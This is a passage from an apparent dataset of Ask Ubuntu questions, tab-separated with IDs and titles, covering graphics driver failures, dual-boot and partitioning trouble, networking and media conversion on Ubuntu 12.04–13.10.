) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( core ) - warn : unhandled configurenotify on 0x8400090 ! compiz ( core ) - warn : this should never happen . you should probably file a bug about this . compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( core ) - warn : unhandled configurenotify on 0x8400093 ! compiz ( core ) - warn : this should never happen . you should probably file a bug about this . compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( core ) - warn : unhandled configurenotify on 0x8400096 ! compiz ( core ) - warn : this should never happen . you should probably file a bug about this . compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( core ) - warn : unhandled configurenotify on 0x8400099 ! compiz ( core ) - warn : this should never happen . you should probably file a bug about this . compiz ( core ) - warn : unhandled configurenotify on 0x8400096 ! compiz ( core ) - warn : this should never happen . you should probably file a bug about this . compiz ( core ) - warn : unhandled configurenotify on 0x8400093 ! compiz ( core ) - warn : this should never happen . you should probably file a bug about this . compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 ... compiz ( core ) - warn : unhandled configurenotify on 0x840009f ! compiz ( core ) - warn : this should never happen . you should probably file a bug about this . compiz ( core ) - warn : unhandled configurenotify on 0x8400096 ! compiz ( core ) - warn : this should never happen . you should probably file a bug about this . ... compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( core ) - warn : unhandled configurenotify on 0x8400096 ! ... . compiz ( core ) - warn : this should never happen . you should probably file a bug about this . compiz ( core ) - warn : unhandled configurenotify on 0x8400093 ! compiz ( core ) - warn : this should never happen . you should probably file a bug about this . compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 initializing animation options ... done initializing expo options ... done initializing ezoom options ... done initializing fade options ... done initializing opengl options ... done initializing scale options ... done initializing staticswitcher options ... done initializing unitymtgrabhandles options ... done initializing unityshell options ... done initializing wall options ... done setting update `` main_menu_key '' setting update `` run_key '' starting gtk-window-decorator compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 ... compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 ... . compiz ( decor ) - warn : requested a pixmap type decoration when compositing is n't available ... compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 x^ [ compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 segmentation fault ( core dumped )
417853	good option for a command line sip client ?	i am looking for a simple command line based sip client that can do the following : can register to a elastix pbx auto answer calls play a ring sound dial a extension when a key is pressed or be executed with a bash command ( i.e ./call1 ) preferably , can be programmed on c is there any alternative to pjsua ? thank you very much .
417859	input not supported	i have installed my first copy of ubuntu on an older pc . everything seemed to go well with the installation . but at the first boot , my screen gives the message : input not supported . i have tried several things : ctrl + alt + + and nothing happend . all of a sudden , it gave me some kind of a msdos screen where i could type things . i could log in with the credentials that i set up at the install . i typed : sudo update-grub everything started updating and it went allright . but then i rebooted again and still had the same problem . i saw a help post , here on the askubuntu , and it said i had to uncomment a resolution line . but i dont know where i can reach that file . my question is : is there a way i can get this screen to work , or do i , pretty much , have to find my another monitor ... thanks in advance .
417861	how to compile gwibber3.6 on ubuntu 12.04.4	i have installed fresh copy of ubuntu 12.04.4 and gwibber is not working . ca n't connect to facebook . error . app not setup : the developers of this app have not set up this app properly for facebook login . so i want to compile gwibber3.6 but im getting this error after ./configure : no package 'libaccounts-glib ' found no package 'libsignon-glib ' found i do n't know where to get them . i need some help with this .
417862	nvidia proprietary driver hangs/freezes/blank screen at login in 13.10	i am running a fresh copy of ubuntu 13.10 with a nvidia gts 450 . with the open source nouveau driver , everything works fine albeit not as fast as the proprietary driver . when i install the proprietary nvidia driver , the screen hangs/freezes just before login . the computer boots up and just before login the monitor enters power savings mode . at this point , i can still ssh into the computer but the screen and keyboard attached the machine are frozen . i have to do a hard shutdown . i have tried the following drivers but each of them suffers the same problem . 304 ( ubuntu software center ) 304-updates ( ubuntu software center ) 319 ( ubuntu software center ) 319-updates ( ubuntu software center ) 331 ( xorg edgers ppa ) 331 ( nvidia 's website ) here 's a video which demonstrates the problem the problem . this started happening only in 13.10 for me . 13.04 was fine . strangely enough , i can sometimes get in using the recovery mode . i select recovery mode , go to fail-safe mode , press ctrl+alt+f1 to fall back to command prompt when reconfigure graphics dialog is displayed . then i press ctrl+c to kill the current process and after that it boots straight to the login screen using the proprietary driver . here 's a video of the workaround . any thoughts ? update feb.18 : this problem has been repeated on one of my other machines running an nvidia card . the machine was running 13.04 with proprietary drivers and was upgraded to 13.10 . after the upgrade , the same black screen issue occured . sshing into the machine and reverting to the open source drivers fixed the problem .
417863	flash player problem ( ca n't allow acess to my webcam	i 'm using ubuntu 13.10 and firefox 26.0 and trying to allow acess to my webcam via http : //www.macromedia.com/support/documentation/en/flashplayer/help/settings_manager04.html so , the problem is that the tab `` web site privacy settings '' does n't show any site that i 've accessed , even the site that i 'm trying to allow the acess to my webcam . what can i do ?
417865	ubuntu wo n't install on unallocated space alongside windows 7	i have a windows 7 ( preinstalled ) dell desktop . i used the windows partition manager to shrink the main partition by 400 gb . the tool froze before confirming completion , but when i re-executed it , everything looked as expected . i then rebooted the system three times to make sure windows was feeling good about the smaller hard drive . i then booted to the ubuntu 13.10 live cd to use the installer tool . i was greeted with the system acknowledging that an os existed , so i selected to install alongside . ubuntu produced an uniterpretable error that literally read : ? ? ? ? ? ? ? ? . i clicked ok , and the install tool now only gives the option to erase disk or something else . i decided to open gparted to get an idea of what was going on , and it continues to get hung up on searching /dev/mapper/isw_ebffchhbhf_array partitions . when i run it from the command line i get the following error : ubuntu @ ubuntu : ~ $ sudo gparted ====================== libparted : 2.3 ====================== ( gpartedbin:13899 ) : glibm m-critical ** : unhandled exception ( type glib : :error ) in signal handler : domain : g_convert_error code : 1 what : invalid byte sequence in conversion input here is the output from sudo parted -l error : ca n't have a partition outside the disk ! error : /dev/sdb : unrecognised disk label model : linux device-mapper ( linear ) ( dm ) disk /dev/mapper/isw_ebffchhbhf_array3 : 1570gb sector size ( logical/physical ) : 512b/512b partition table : loop number start end size file system flags 1 0.00b 1570gb 1570gb ntfs model : linux device-mapper ( linear ) ( dm ) disk /dev/mapper/isw_ebffchhbhf_array2 : 789mb sector size ( logical/physical ) : 512b/512b partition table : loop number start end size file system flags 1 0.00b 789mb 789mb ntfs model : linux device-mapper ( linear ) ( dm ) disk /dev/mapper/isw_ebffchhbhf_array1 : 41.1mb sector size ( logical/physical ) : 512b/512b partition table : loop number start end size file system flags 1 0.00b 41.1mb 41.1mb fat16 model : linux device-mapper ( striped ) ( dm ) disk /dev/mapper/isw_ebffchhbhf_array : 2000gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 32.3kb 41.1mb 41.1mb primary fat16 diag 2 41.9mb 830mb 789mb primary ntfs boot 3 830mb 1571gb 1570gb primary ntfs model : usb flash memory ( scsi ) disk /dev/sdg : 8015mb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 32.3kb 8015mb 8015mb primary fat32 boot and the output of sudo blkid /dev/loop0 : type= '' squashfs '' /dev/sda : type= '' isw_raid_member '' /dev/sdb : type= '' isw_raid_member '' /dev/mapper/isw_ebffchhbhf_array1 : sec_type= '' msdos '' label= '' dellutility '' uuid= '' 5450-4444 '' type= '' vfat '' /dev/mapper/isw_ebffchhbhf_array2 : label= '' recovery '' uuid= '' 2418be8718be578e '' type= '' ntfs '' /dev/mapper/isw_ebffchhbhf_array3 : label= '' os '' uuid= '' ec94c46294c430be '' type= '' ntfs '' /dev/sdg1 : uuid= '' 34c6-275a '' type= '' vfat '' does anyone have any advice ? any idea what the issue is ?
417867	custom ubuntu cd : show a custom message	i am building a custom ubuntu cd using https : //help.ubuntu.com/community/installcdcustomization , i use preseed to customize the installation , but i have to display a message before the installation begin , and neither commands say or display work . i also want to backup some data on the disk before the installation if there is already a linux debian filesystem . how can i do this ?
417868	network manager breaks manual routes	i have ubuntu 13.10 , saucy salamander x64 running as a guest in virtualbox ( with windows 7 as a host ) . i wrote this /etc/network/interfaces because i need to add a large number of permanent , manual static routes : # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp auto eth1 iface eth1 inet dhcp up ip -force -b /etc/network/eth1-routes eth1-routes contains several lines of the form : route add 10.0.0.0/8 via 172.x.x.x dev eth1 where 172.x.x.x is the gateway that vbox nat gives me . by running netstat -nr it appears that all of my manual routes have been successfully added , including routes to get to two dns servers via 172.x.x.x . however , network manager says that both devices are `` not managed '' . if i set /etc/networkmanager/networkmanager.conf managed=true , network manager works again but my routes are lost . so my current compromise is to set managed=false and comment out the eth0 lines in /etc/network/interfaces . is there a way to have a device be managed and still do manual routes as above ?
417870	initclt not seeing init script in ubuntu 12 64bit	i created an init script in lsb format , and copied it to the /etc/init.d directory . i can manually start , stop , status the service and all works fine . i then try to set the service to auto stop/start with runlevels by doing : update-rc.d service defaults and i see warnings like : update-rc.d : warning : xxx start runlevel arguments ( none ) do not match lsb default-start values ( 3 4 5 ) . and initctl list '' does not show my service . is there a step i need to do to make this service register or appear properly ? ( i know on redhat it 's `` chkconfig -- add xxx ) but i do n't know ubuntu well enough .
417872	remotely view photos in ubuntu pc from an ipad	in this answer it is explain how to use a program called remiew to remotely view photos in a computer from a mobile device . the principle is quite straightforward : the program is an http server that displays your directory tree and if you click on an image file a slideshow is displayed . question is : since remiew is for windows ( and did n't run at first attempt with wine ) , is there an alternative for linux ? i use linux mint petra .
417874	cifs vfs : server xxx has not responded in 120 seconds	i am having a problem with a windows mount that becomes unavailable and hang any process accessing it . doing a dmesg gives this : [ 1566.033468 ] cifs vfs : server xxx.xxx.xxx.xx has not responded in 120 seconds . reconnecting ... but nothing happens . i 'm running ubuntu 13.10 in virtual box 4.3.4 that runs in windows . when i reboot , everything works fine for a bit . when i stop accessing the mount point for 15-30 minutes , i get the error . i found the following information : http : //ubuntuforums.org/showthread.php ? t=2113218 but it did not help . also found bugs in samba : https : //bugzilla.samba.org/show_bug.cgi ? id=9356 & it links to bug # 9422 also . not sure if it is related . any help appreciated . thanks , marc
417876	dual screens black after install of propietory amd drivers	i upgraded to ubuntu 13.10 . using the non-propietory ( tahity , gallium ) drivers i got a good result , except that my second screen ( a tv ) became the login screen . i installed amd 's propietory drivers according to this guide : http : //wiki.cchtml.com/index.php/ubuntu_saucy_installation_guide # installing_catalyst_manually_.28from_amd.2fati.27s_site.29_stable yes , i have the right hardware , etc . for that : radeon hd 7950 ; and there were no ( insurmountable ) problems before . i got a normal login screen , but after login a message said that the dual screen config could not be loaded ( the total resolution of the screens is too large e.g . if one puts 2 large screens next to each other ) . note that there was no such problem with the non-propietory drivers . instead of a low res screen like the login screen , the screen went black . a black screen , who ever thought of that . question is : how do i get at least 1 workable screen back ? please do n't assume that i know what code to type and where , or how to get files without a screen . { i could start a tty , but sudo startx did not help . i could enter recovery mode , but the menu 's this brought up were unreadable . } { as an aside , i would like to say that i am really puzzled by the fact that dual screens are set up in 2 places : in the settings from ubuntu and in in amd 's ccc setup thingy . } to go to the previous situation , i did : sudo sh /usr/share/ati/fglrx-uninstall this looked successful , there were no complaints , but now it wo n't even accept my password . so , i give up . so much time wasted already . edit : ubuntu accepted the new password but wo n't login with it . earlier i tried the amd 14.1 beta but it gave a screen of 1200 by 1200 pixels , leaving the remaining 600 by 1200 pixels to the right black .
417877	play on linux isskin.dll	i 've been trying to get the game victoria 2 to work on play on linux for a few days now , but i keep encountering an error message saying runtime error ( at -1.0 ) can not import dll : c : \users\username\temp\is-m7fi1.tmp\isskin.dll i 've looked up this problem before , and one answer i found was to install vcrun6sp6 through winetricks , which i proceeded to do , but to no avail . i tried uninstalling and reinstalling wine , installing direct x , but nothing is working . any help would be appreciated . thank you .
417884	install 13.04 software on 13.10	i want to install the beta for the bitcasa client , but it only works for 13.04. https : //www.bitcasa.com/download-linux on the 3rd step of the install page , where it says to : sudo apt-get update & & sudo apt-get install bitcasa i get the following , which i interpret to mean that my 13.10 version is not supported . is there a workaround for this ? ign http : //us.archive.ubuntu.com saucy-backports/universe translation-en_us err http : //ppa.launchpad.net saucy/main amd64 packages 404 not found err http : //ppa.launchpad.net saucy/main i386 packages 404 not found ign http : //ppa.launchpad.net saucy/main translation-en_us ign http : //ppa.launchpad.net saucy/main translation-en ign http : //ppa.launchpad.net saucy/main translation-en_us ign http : //ppa.launchpad.net saucy/main translation-en ign http : //ppa.launchpad.net saucy/main translation-en_us ign http : //ppa.launchpad.net saucy/main translation-en ign http : //ppa.launchpad.net saucy/main translation-en_us ign http : //ppa.launchpad.net saucy/main translation-en fetched 1,162 kb in 5s ( 209 kb/s ) w : failed to fetch http : //ppa.launchpad.net/freenx-team/ppa/ubuntu/dists/saucy/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/freenx-team/ppa/ubuntu/dists/saucy/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead .
417888	computer does not detect ubuntu 13.10	i need help . i have an hp pavilion g7 desktop computer , originally came with windows 7 but then i upgraded to 8 , and i backed up all my files to another partition , and tried to install ubuntu , i deleted every partition but my backups , and created my swap area and ext4 install partition . and ubuntu installed as normal , when it finished , i rebooted my computer , then get an error message saying something like this `` operating system not found , or the disk may be damaged . '' how do i fix this ? also , could i change the ext4 to an ntfs , and would that fix the problem ?
417889	how do i change my lock screen in ubuntu 13.10 ?	currently my lock screen is what i am assuming is the default lock screen . the command : gnome-screensaver-command -l activates this screen . i installed light-locker and want the system to use this instead , but when my system goes into suspend it still activates the gnome-screensaver 's lock screen . also , the reason for wanting to switch is the gnome lock screen does n't always allow me to `` switch user '' . thanks .
417891	ubuntu touch apt-get	in ubuntu touch on a tablet , can i use apt-get to access ubuntu repositories with native apps - and will native apps run in ubuntu touch ? cheers , jesper
417893	12.10 upgrade failed , please help . getting boot error	i was doing the upgrade 12.04 to 12.10 everything went fine , final step was to restart , while rebooting it came up with ... . error ; file '/boot/grub/i386-pc/normal.mod ' not found . grub rescue
417894	bios as bootloader	i am considering installing windows next to ubuntu . ubuntu is installed on a small-ish ssd , and i would like to keep it clean . can windows be installed on a second hard drive ? can i use the bios as an bootloader , switching between the two bootable drives ? i have not found anyone using this setup on the internet . there are lots of posts on the impossibilities of installing windows on an external hard dive though .
417897	arithmetic with variables	i am trying to do arithmetic as i assign a variable a value . when the script reaches end_day it can not do the math , and when i test it in the terminal it will simply return the expression . what do i need to do to get a result assigned to the variables . here is part of the script , $ fhour comes from elsewhere and is simply a two digit number . # date variables export start_year= $ ( date -u + % y ) export start_mon= $ ( date -u + % m ) export start_day= $ ( date -u + % d ) export start_hour= $ fhour export end_year= $ ( date -u + % y ) export end_mon= $ ( date -u + % m ) export end_day= $ { $ start_day+ ( ( ( ( $ start_day*24 ) +84 ) /24 ) - ( ( ( $ start_day*24 ) +84 ) % 24 ) ) } export end_hour= $ { ( $ start_day*24+84 ) % 24 } thanks for any help !
417898	apache virtual host not working	my server in the cloud was just moved to a new location with a different ip address . nothing else was changed . i went to my host and changed my dns names to point to the new ip address . my apache virtual host configuration worked fine at the old location but will not work now . when i type the command apachectl -s , i am told that the virtual host configuration is exactly what it should be , but it does not work . when i type the dns name url for any of the virtual hosts into a browser i end up at the default site instead of the one specified for the virtual host . as i said , everything is the same as before except for the ip address . any thoughts or suggestions would be greatly appreciated . thank you very much !
417899	increase storage for ubuntu ( under virtualbox )	i installed ubuntu in my vm with fixed storage of 16gb . i added a new disk from virtual box , also on sata , but i do n't see it in ubuntu . is there anything else i need to do ?
417900	grub destroyed win7 boot loader , now neither work	i had win7 on my laptop ( technically still do ) and i installed ubuntu 13.10 on an unused portion of the drive . ubuntu started up ok , but did n't work well with my wireless at work . so i tried to boot back into windows and it wo n't load the bootloader . if i select the system part ( which contains a loader ) it does nothing . if i select to boot from the part i know has the copy of windows it fails with a c000000f error ( file not found ) . i tried to repair the boot manager using the win7 dvd , but now not even gimp is showing up . i know i can get grub to work again , but i think i have to repair the windows boot loader first . i 'm not sure how to do that . i know this should probably go in an `` ask win7 '' se , but i do n't know of one . so if anyone can help me restore windows or point me to a good windows tech forum i 'd appreciate it . edit : here 's a little more technical detail . i have an hp laptop that came configured with four drives : system , main , hp_tools , recovery . system is what it says it is . it 's actually the boot drive that loads the operating system on main . when i installed grub i put it on system thinking that would cause the least amount of confusion to the core boot loader . however , i realized this was a mistake early when i tried to boot to that drive only for grub to reappear . i tried to boot into main but that caused the 0xc000000f error . i ca n't find a log that tells me what is causing that error . i can ( now ) boot into ubuntu just fine . boot-loader did n't detect a problem on any of the drives and it did n't fix anything . re-edit : i should also probably mention that these four drives used to each be primary partitions . i changed hp_tools and recovery to logical partitions . i 'm not sure if this is important or not , but something i read somewhere made me think it could make a difference .
417904	how can i convert my mp4 files to avi using avconv ?	i need to convert some mp4 files to another format ( i chose avi : there may be a better one , suggestions welcome ) . i tried using ffmpeg but got the deprecated message so i am using avconv , but again there may be a better tool . here 's what i 'm using : avconv -i e2.mp4 -vtag libxvid -b : v 1500k e2.avi this gives me the following output : avconv version 0.8.9-6:0.8.9-0ubuntu0.13.10.1 , copyright ( c ) 2000-2013 the libav developers built on nov 9 2013 19:09:46 with gcc 4.8.1 [ mov , mp4 , m4a,3gp,3g2 , mj2 @ 0x1c677a0 ] multiple edit list entries , a/v desync might occur , patch welcome input # 0 , mov , mp4 , m4a,3gp,3g2 , mj2 , from 'e2.mp4 ' : metadata : major_brand : isom minor_version : 512 compatible_brands : isomiso2avc1mp41 encoder : lavf53.21.1 media_type : 10 copyright : ďż˝ 2014 british broadcasting corporation , all rights reserved title : episode 2 artist : bbc four album_artist : bbc tv album : the bridge : series 2 composer : bbc iplayer genre : drama comment : online , four individuals in masks use signs to claim responsibility for the plague . date : 2014-01-04t22:00:00z track : 2 disc : 2 description : online , four individuals in masks use signs to claim responsibility for the plague . show : the bridge : series 2 episode_id : s02e02 season_number : 2 episode_sort : 2 network : bbc four duration : 00:57:38.16 , start : 0.000000 , bitrate : 2399 kb/s stream # 0.0 ( und ) : video : h264 ( high ) , yuv420p , 1280x720 [ par 1:1 dar 16:9 ] , 2298 kb/s , 25 fps , 25 tbr , 1k tbn , 50 tbc stream # 0.1 ( und ) : audio : aac , 48000 hz , stereo , s16 , 93 kb/s [ buffer @ 0x1c69260 ] w:1280 h:720 pixfmt : yuv420p incompatible sample format 's16 ' for codec 'ac3 ' , auto-selecting format 'flt' [ ac3 @ 0x1c2a160 ] invalid bit rate output # 0 , avi , to 'e2.avi ' : metadata : major_brand : isom minor_version : 512 compatible_brands : isomiso2avc1mp41 encoder : lavf53.21.1 media_type : 10 copyright : ďż˝ 2014 british broadcasting corporation , all rights reserved title : episode 2 artist : bbc four album_artist : bbc tv album : the bridge : series 2 composer : bbc iplayer genre : drama comment : online , four individuals in masks use signs to claim responsibility for the plague . date : 2014-01-04t22:00:00z track : 2 disc : 2 description : online , four individuals in masks use signs to claim responsibility for the plague . show : the bridge : series 2 episode_id : s02e02 season_number : 2 episode_sort : 2 network : bbc four stream # 0.0 ( und ) : video : mpeg4 , yuv420p , 1280x720 [ par 1:1 dar 16:9 ] , q=2-31 , 1500 kb/s , 90k tbn , 25 tbc stream # 0.1 ( und ) : audio : ac3 , 48000 hz , stereo , flt , 200 kb/s stream mapping : stream # 0:0 - > # 0:0 ( h264 - > mpeg4 ) stream # 0:1 - > # 0:1 ( aac - > ac3 ) error while opening encoder for output stream # 0:1 - maybe incorrect parameters such as bit_rate , rate , width or height i also get a e2.avi file which is empty . i have not used avconv before - what would be the correct way to do this ? i can post more details if needed . thanks in advance !
417907	is it safe to defrag windows 8 while dual booting ubuntu ?	i have owned my laptop now for about 8 months a feel its slightly slowing a bit and i think it is time for a defrag . should i be worried about windows 8 effecting the ubuntu partion part of my harddrive ? also can i , should i or is it even possible to defrag ubuntu 's side of the partition . thank you in advance for the info . thanks
417913	partioning setups for 2 hd , 2 os computer	i have been trying to install ubuntu on a computer , and do n't know how i need to partition the hard drive for a fresh ubuntu 13.10 install . i am using 2 1 tb hard drives , one run windows , and the other one has been formatted to nfts ( no data ) for use in installing linux . i plan on both learning linux on this computer and using it to get work done . i 'm thinking of doing partition ( s ) for ubuntu files and folders , then a large nfts partition to share data with the windows 7 hard drive . aside from the above two partitions , what are recommended and/or required partitions for setting up ubuntu ? i 'm looking for partition file system types , sizes , and mount points . i have 1 tb to work with , and would like some buffer room in the system partitions .
417914	how do i update my nvidia driver ?	to start off , here are my system specs : memory 3.8 gib , intel core i3-2350m cpu @ 2.30ghz x 4 , graphics nvidia geforce 450m , 64 bit . ok , i installed ubuntu and as soon as it booted up , it ran fine . then i installed the hardware drivers that you can find in the system settings . it prompted me to restart so i did , and as soon as it booted up , i chose the top choice which was ubuntu , not recovery mode . and as soon as it was chosen , i noticed the words in the boot up prompt were bigger , and it just stayed at a black screen with a dash blinking at the top left of the screen . i am new to ubuntu so i do n't know if i did something wrong , but any help will be very much appreciated .
417916	ubuntu starting in terminal mode no gui , even `` startx '' do n't load gui mode now ?	ubuntu 12.04 32bit ubuntu stopped loading in gui mode just gives me a terminal mode . it use to work fine as normal but for some time it stopped loading in gui mode but will just load in like a terminal which keeps blinking and does nothing . ( dont even ask me for username and password . ) if i go in previous kernel modes then i can get into a terminal based shell which will ask me for my : - user login - password i was able to log in in this terminal mode and after that i will type `` startx '' will start the x server and everything will work as normal from there . but now even xserver stopped working . on typing `` startx '' it gives me : xauth : error in locking authority file /home/myusername/.xauthority xauth : error in locking authority file /home/myusername/.xauthority /etc/x11/xinit/xserverrc : 3 : exec : usr/bin/x : not found xinit : giving up xinit : unable to connect to xserver : no such file or directory xinit : server error xauth : error in locking authority file /home/username/.xauthority i have tried sudo apt-get install update or even reintalling nvidia drivers by : sudo apt-get install -- reinstall nvidia-current or purging the current kernel and going back to previous one but no luck still stuck in terminal mode with `` startx '' not working how can fix it ? i do n't want to format my pc as its too much pain to set it up all again . thank you for help in advance .
417923	mouting a windows network drive in ubuntu	i 'm trying to access my shared windows drive with my ubuntu laptop . in windows all i have to do is go to run and type \\computer\drive and the drive opens up . is there a quick and easy way to do this in ubuntu ?
417925	unable to download deb packages from a private repo	i am trying to setup a private apt repo using this . have followed the instructions closely . after setting up everything sudo apt-get update works fine ( i see packages file being fetched from apt-repo ) but when i try to install a package it fails ( i downloaded .deb of haproxy using sudo apt-get -d install haproxy . err http : //ec2-54-220-154-205.eu-west-1.compute.amazonaws.com/packages/ ./ haproxy 1.4.24-1 404 not found failed to fetch http : //ec2-54-220-154-205.eu-west1.compute.amazonaws.com/packages//home/ubuntu/packages//h/haproxy_1.4.24-1_amd64.deb 404 not found as you can see the url to the deb package is incorrect . this path ( /home/ubuntu/packages//h/haproxy_1.4.24-1_amd64.deb ) is read from packages file which is generate by dpkg-scanpackages dpkg-scanpackages ~/private /dev/null | gzip -9c > ~/private/packages.gz . ( i am not 100 % sure if it is a dpkg-scanpackages issue or a nginx config issue , my experience with nginx is not a whole lot ) . any help in trying to fix this would be great . thanks
417926	could not write bytes : broken pipe after chown in /usr	when i boot ubuntu 12.04 , i get this message on screen and the the system does not boot . this happened after i did the following : i installed tor-browser . when i tried to run it , it gave an error that /usr/bin/tor-browser permissions are set to root . so i did the following ( was a mistake ) : sudo chown -r username /usr/ now when i tried to run sudo , it gave the error : sudo : setuid must be root to fix this , i rebooted to go to the grub menu . there i entered 'e ' to edit the commands before booting . in the command beginning with linux , i appended rw init=/bin/bash so that i can get a root logged in terminal ( i have forgotten my root password ) . when the command prompt loaded , i entered the following commands : mount -o remount , rw / mount -- all chown root : root /usr/bin/sudo chmod 4755 /usr/bin/sudo now when i rebooted , ubuntu does not boot and gives the message could not write bytes : broken pipe
417930	ca n't get working drivers for nvidia 330m - macbook pro 6.2 - 12.04 lts	yes… one more post about nvidia driver… sorry ! usually i always found answers to my questions by reading through forums like ask ubuntu . this time , even after a week ( almost 10 re-installations of ubuntu ) , i haven’t found anything that helped me to solve my problem . as i said i’m having troubles with the installation of the nvidia graphics card driver . here is my configuration : macbook pro 6.2 ( mid 2010 ) cpu intel core i7 2.66ghz gpu intel hd graphics ( build in ) gpu nvidia geforce gt 330m ( pcie ) ubuntu 12.04 lts x64 ( also tried under 13.10 ) i’ve tried many ways to get the right driver correctly installed but none of them worked yet ( most of the time i get black screen after reboot ) . am i right if i try to install the driver version 331.38 from nvidia ? anybody could indicates me a working procedure to get this driver installed ? i have to precise that i’m a relatively new linux user . many thanks in advance
417932	export rhythmbox ratings and play counts to id3 tags	is there a way to export rhythmbox ratings to id3 tags , or migrate them in some other way ? maybe some easytag or puddletag reads rhythmbox config files ? or is there a utility to do migration ? preferably also playcounts , although not sure if there is a playcount id3 field . i 'd like to migrate from rhythmbox to another linux mp3 player , as rb does n't have some of the features i need . i 'm looking at clementine mainly for smaller footprint . migrating ratings is holding me back .
417935	what are the command-line alternatives to network manager ( nm-cli ) , wicd ( wicd-curses ) , wpa_supplicant for managing wireless ?	ok , i know that i am crossing out the most popular choices out there , but there is a reason for that . i am working on a beaglebone black running an ultra light version of ubuntu 13.04 and i currently have it hooked up on the router via ethernet . i only interact with the beaglebone through ssh and i like to keep everything on the command line ( x is not even installed ) . ideally i want to connect to the router wirelessly , through the usb dongle i have attached to it , but : the storage capacity of this microcontroller is limited , therefore the ~250mb of the network manager with its command line tools is a solution that does not `` fit '' . wicd seemed like a great alternative . wicd-curses is exactly what i am looking for : a clear and easy to use command line interface , easy to scan for networks , select yours and configure passwords , etc . however , when i try to connect to a network it crashes gloriously and i failed to solve the problem . wpa_supplicant does provide what i need , but `` the hard way '' , so i want to avoid it , if possible . are you aware of any other application that can help me connect to my wpa wireless network through command line , without having to configure everything manually ?
417937	will ubuntu create any issues with windows 8	i am a beginner with ubuntu , and am sick of w8 can i run it from a usb drive without damaging the windows 8 ? i am a novice in systems and programming , i just want a backup os for things i need to run ty
417938	grammar checking program for libre office	a tool for checking grammar ? like ginger in windows . ca n't find any in software center .
417941	why is n't window-snap working on ubuntu 12.04 + gnome shell	i am trying to get the window-snap feature to work but can not . i started with ubuntu 12.04 ( installed on a virtualbox with windows 7 hosting ) . i ca n't get 3d acceleration to work on virtualbox , so unity 2d is running and does n't have snap ( since compiz is n't running , i assumed ) . following some googling , i found that you can set unity 2d to use compiz . tried that and my system did n't seem to like that either . next step , i tried switching to gnome shell , where i read that window snap is integrated . i installed gnome shell using : sudo add-apt-repository ppa : gnome3-team/gnome3 sudo apt-get install gnome-shell gnome shell works fine , but i still do n't have window snap ! is there any way to get this simple feature to work ?
417943	is it possible to set two different user accounts on different hd or partition ?	i have installed ubuntu in a 20 gb hd , and i have two more hd , ( 160 gb hd and 80 gb hd ) . but in order to have my data safe ( and more easily configure/change/alternate os system ) . i want to set two user in the other two hd , respectly . i can setup a user in a different hd ( apart from de system hd ) , but no idea how to set up the other user in the remaining hd ... i didnâ´t find how to set the two user in two hd . any help ? or idea where to find how to set it up ? . i would prefer gui configuration ... regards ! thanks for your help !
417945	how to make kde applications ' toolbars dark in ubuntu ?	is there a way to make kde applications , running in ubuntu 13.10 , have dark tool bars ? for example , see the gedit toolbar in the image below . the toolbar is dark , with light icons and text , but the kate toolbar is light grey . ( i do not want the rest of the window elements below the tool bar to be dark , as can be done by simply selecting a dark theme using the kde system settings dialog ) .
417946	newbie question ... my intel dz77bh-55k came with a windows express installer disk	which obviously , even to me , does n't work under ubuntu 12.04 . does ubuntu sort everything out for itself , or do i have to find drivers ? somewhere . along the same lines i have a nvidia 450 gforce graphics card , plus there is some built in hd graphics on the mobo all i get under settings is driver unknown experience standard . under startup aplications there is a mention of nvidia x server settings ? again , am i likely to need supplemental drivers . at the moment all i know how to do is boot into ubuntu , search the web , and inspect the file system , i am grass green as far as linux goes .
417951	typing while desktop is in focus to navigate to folder	back in 12.10 i used to be able to just start typing ( while the desktop or open folder window was in focus ) and the folder or file name i would type would get selected . then i could press enter to navigate into the folder or open the file . for some reason i ca n't do this anymore in 13.10 while the desktop is in focus . if an open folder window is open it works though . how can i get this type-to-navigate-to functionality while focused on the desktop in 13.10 ?
417952	ubuntu 13.10 setup does not detect windows 8.1 on vaio tap 21 !	so i 've downloaded the 64-bit ubuntu image , burnt it to disk and disabled secure boot via the uefi setup menu ... but when i run the installation on my sony vaio tap 21 , ubuntu setup tells me that no operating system ( in my case , microsoft windows 8.1 , upgraded from the factory-installed microsoft windows 8 ) is installed ! how can i get ubuntu 13.10 to detect windows 8.1 , so that i can dual-boot with both ubuntu and windows 8.1 ? by the way - i am fairly competent with computers ... but partitioning is definitely not my strong point , so please keep this in mind when suggesting a solution .
417961	problem opening gedit ubuntu 13.10	i have this problem while trying to open gedit in ubuntu 13.10 : gedit : symbol lookup error : gedit : undefined symbol : g_option_context_parse_strv i reinstalled ubuntu , and afterwards i got this issue . any suggestion ?
417962	bluetooth audio stutters - other audio works perfectly	i know similar questions have been asked , but i am unable to resolve my issue . i have a usb bluetooth dongle . running ubuntu 12.04 ( xfce ) . i have a jaybird freedom 3 bluetooth head phones . i have no issues pairing the device . when i play any audio thru the jaybirds , it stutters . something like on for 1-2 seconds , off for 1-2 seconds , etc . playing audio thru my sound card works normally . i am still fairly new to linux in general and am lost on how to resolve this issue ...
417963	nic in monitor mode used by two program simultaneously	presently i am designing sniifer that is uses nic in monitor mode but side by side i am also using wireshark ( for which also nic in monitor mode ) . so both this program using monitor mode simultaneously . so i want to know does it possible that two program using nic in monitor mode simultaneously ? does it affect on packet capturing ?
